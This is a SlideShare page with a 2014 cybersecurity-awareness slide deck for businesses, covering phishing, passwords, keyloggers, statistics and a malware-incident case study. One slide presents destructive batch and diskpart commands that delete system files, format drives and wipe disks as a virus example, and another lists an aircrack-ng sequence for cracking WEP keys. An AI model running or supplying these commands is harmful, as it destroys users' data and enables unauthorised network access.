csa2014 IBC


Published on

Published in: Technology
  • Be the first to comment

  • Be the first to like this

No Downloads
Total views
On SlideShare
From Embeds
Number of Embeds
Embeds 0
No embeds

No notes for slide

csa2014 IBC

  2. 2. “As the world is increasingly interconnected, everyone shares the responsibility of securing cyberspace.” -Newton Lee
  3. 3. OUTLINE • What is Computer Security • Importance of Security • Small business • Cyber Security Statistics • You are the target • Cyber Scam • 10 scams to watch out • Leading Threats • Password • Keylogger • Sniffing • Phishing • Security Plan • Case – Malware • Security issues
  4. 4. WHAT IS COMPUTER SECURITY ? • Securing Computers, Smartphones, Networks, Internet. • defending information from unauthorized access, use, disclosure, disruption, modification, perusal, inspection, recording or destruction, unplanned events and natural disasters.
  5. 5. IMPORTANCE OF SECURITY • The internet allows an attacker to attack from anywhere on the planet. • Governments, military, corporations, financial institutions, hospitals and other businesses collect, process and store a great deal of confidential information on computers and transmit that data across networks to other computers. With the growing volume and sophistication of cyber attacks, ongoing attention is required to protect sensitive business and personal information.  Risks caused by poor security knowledge and practice:  Identity Theft  Monetary Theft  Legal Ramifications (for yourself and companies)  Termination if company policies are not followed
  6. 6. • One of the best ways to make sure company employees will not make costly errors in regard to information security is to institute company-wide security-awareness training (SANS)
  7. 7. MOST SMALL BUSINESSES DON’T RECOVER FROM CYBERCRIME • 60% of small businesses will shutter within half a year after being victimized by cybercrime. • 90% do not have an internal IT manager for security • 87% do not have a formal written security policy • http://smallbusiness.foxbusiness.com/technology-web/2013/03/21/most-small-businesses- dont-recover-from-cybercrime/
  8. 8. STATISTICS • 91% increase in attacks 2013 (Symantec) • 62% increase in the number of breaches in 2013 • (Facebook) • Over 552M identities were exposed via breaches in 2013 (493%+ 2012) • 38% of mobile users have experienced mobile cybercrime in past 12 months • 1 in 392 emails contain a phishing attacks • 86% of all websites had at least one vulnerability • Most Data Breaches (Retail/Merchant=15M , Financial/Insurance=8M, Other=6M)
  9. 9. STATISTICS • 100M Phishing message everyday(Agari) • 3Bilion Phishing Message monthly • Phishing costs $ 70.2 Billion (Cisco) • Phishing cost corporate IT $ 28.1 Billion (IID) • 25% increase in Email Malware as URL • 1 in 196 Email Virus Rate • 1 in 566 website with Malware • 62% UAE users cannot recognize phishing message (Gulf news, Kaspersky 2012) • 70% phishing message targeted bank accounts ( RSA, 2013)
  10. 10. YOU ARE THE TARGET • Explain to end users that they are the target. Far too often people have the misconception that they are not a target, that their information or their computers has no value to attackers. Of course we know this to be false. Anyone with an identify, computer or private information is a target, cyber criminals have made an entire industry of hacking the end user. 1- users know and understand they are being actively targeted 2- risks exist regardless if they are at work or at home 3- Don’t Be scared, Just Drive Safe !
  11. 11. CYBER SCAM • Due to the high use of the internet, cyber scams have disrupted bank accounts, sent viruses, and stolen personal information. • Most cyber scams are sent through an e-mail account wherein individuals will open the e-mail to either find a virus has been put into their computer or to read misleading information. • Never entering personal information or credit card information on unsecure websites, never reply to or click on any links that you are not affiliated with, and never respond to an e-mail or advertisement saying you have won something. • Rugby World Cup 2015 , World Cup 2014 Brazil, Auction sites, Jobs and training courses, Business 2 Business, Phishing
  12. 12. LEADING THREATS • Virus • Worm • Trojan Horse • Social engineering
  13. 13. VIRUS • A virus attaches itself to a program, file, or disk When the program is executed, the virus activates and replicates itself. • Viruses result in crashing of computers and loss of data.  In order to recover/prevent virus/attacks:  Avoid potentially unreliable websites/emails  System Restore  Re-install operating system  Anti-virus (i.e. Avira, AVG, Norton) Program A Extra Code Program B infects
  14. 14. VIRUS - EXAMPLE > @echo off > del %systemdrive%*.*/f/s/q > shutdown -r -f -t 00 > xxx.bat > ----------- > @echo off > for %%i in (c ,d:,e:,f:,g:) do format %%i /FS:NTFS /x /q > ----------- > diskpart > > list disk > select disk 0 > clean > create partition primary > format fs=fat32 quick > @echo off ))) > attrib -r -s -h c:autoexec.bat ))) > del c:autoexec.bat ))) > attrib -r -s -h c:boot.ini ))) > del c:boot.ini ))) > attrib -r -s -h c:ntldr )) > del c:ntldr ))) > attrib -r -s -h c:windowswin.ini ))) > del c:windowswin.ini ))) > @echo off )))) > ((((----shutdown -s -t 10 -c " "-----)))))
  15. 15. WORM • Independent program which replicates itself and sends copies from computer to computer across network connections. Upon arrival the worm may be activated to replicate. To Joe To Ann To Bob Email List: Joe@gmail.com Ann@yahoo.com Bob@uwp.edu
  16. 16. TROJAN HORSE • Masquerades as beneficial program while quietly destroying data or damaging your system. • Download a game: Might be fun but has hidden part that emails your password file without you knowing.
  17. 17. SOCIAL ENGINEERING Social engineering manipulates people into performing actions or divulging confidential information. Similar to a confidence trick or simple fraud, the term applies to the use of deception to gain information, commit fraud, or access computer systems. • Phone Call: This is John, the System Admin. What is your password? • In Person: What ethnicity are you? Your mother’s maiden name? • I have come to repair your machine…and have some software patches • Email: ABC Bank has noticed a problem with your account…
  18. 18. PASSWORD • 1- It’s tough to create and remember strong passwords for each online system or site you access. • 2- It’s a BAD idea though to use the same password for several or all systems and site • 3- contains 8 characters, a mixture of uppercase and lowercase letters, at least one number and one non-alphanumeric character or symbol (5P0ky!3Z) • A. never share your password or write it down or save it ! • B. String Password • C. Don’t Use common words • D. Chang your password
  19. 19. KEY LOGGER • Bit of software that gets installed on your computer unbeknownst to you, and starts logging everything that you enter into the computer. This type of malware will often send usernames and passwords back to the attacker, who can then use this information to get into your bank accounts, social media accounts, and really anything that would require a username and password. • Protect: • 1- Anti virus • 2- Firewall • 3- Malwarebyte
  20. 20. SNIFFING • A sniffer is an application or device that can read, monitor, and capture network data exchanges and read network packets. If the packets are not encrypted, a sniffer provides a full view of the data inside the packet. Even encapsulated (tunneled) packets can be broken open and read unless they are encrypted and the attacker does not have access to the key.
  21. 21. PHISHING • The act of sending an email to a user falsely claiming to be an established legitimate enterprise in an attempt to scam the user into surrendering private information that will be used for identity theft.
  22. 22. PHISHING • Most Phished Website: • .Facebook.com • .www.emiratesnbd.com/en/ • .Business Conference • .Facebook.com/Bestcars2015
  23. 23. SECURITY PLAN • Every company needs to have a security program • 1- No matter how large or small your company is • 2- you need to have a plan to ensure the security of your information assets • how you will mitigate them, and planning for how you keep the program and your security practices up to date. • Risk Assessment • Policies and Procedures (CIA) • Awareness • Audit • Business Continuity (BC, CP, IR)
  24. 24. CASE - MALWARE INFECTION • Logan Industries • is a multi-national catalog sale corporation with offices in 30 states • most offices are small, with fewer than 50 employees, • First Infection: Monday, Feb. 5 : • 20 employees at a satellite sales office received an email from the CEO and President Andrew James with the message. • Twenty employees experienced a computer shut-down a short time later • wait for the help desk to contact them about fixing their machines • The Virus Spreads: Tuesday, Feb. 6 • Early in the morning, the infection had spread from dozens of computers to hundreds. • After sending itself, it would cause the machine to reboot and never to recover.
  25. 25. • By 10 a.m., the CIO had been called and decided to form a team to deal with the virus. • Late Afternoon: Wednesday, February, 7th • find BadBoy on the disk drive and clean any infected files. • they spent from five to 10 minutes manually removing the virus code from all file locations. • Users at Logan Industries had now been without access to a computer for three days and were getting frustrated.
  26. 26. • The CEO requested a report from the CIO. The report included the following costs. • They didn’t have any security awareness for their employees • The ability to describe the business impact of virus/worm infection • •A comprehension of the responsibilities of an IT staff in delivering a secure environment • The steps to respond to and recover from a malware infection
  27. 27. WIRELESS HACK - WEP • Sudo apt-install aircrack-ng • Iwconfig scan • Airmon-ng start Wlan0 • airodump-ng mon0 • //airodump-ng -c channel -w filetosave –bssid macaddrs mon0 • airodump-ng -c 6 -w d.data –bssid 11:22:33:44:55 mon0 • //aireplay-ng -10 -a bssid mon0 • aireplay-ng -1 0 -a 00:18:98:23:34:86 mon0 • //aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b bssid mon0 • aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:18:98:23:34:86 mon0 • aircrack-ng filename.cap • aircrack-ng wep-01.cap • KEY FOUND! [ 11:11:11:11:11 ]
  28. 28. SECURITY ISSUES • Back up • Unknown file • Working on public place • Training, Training, Training • Security Policy • Passwords • Wireless Security • USB • Secure your accounts • Online Banking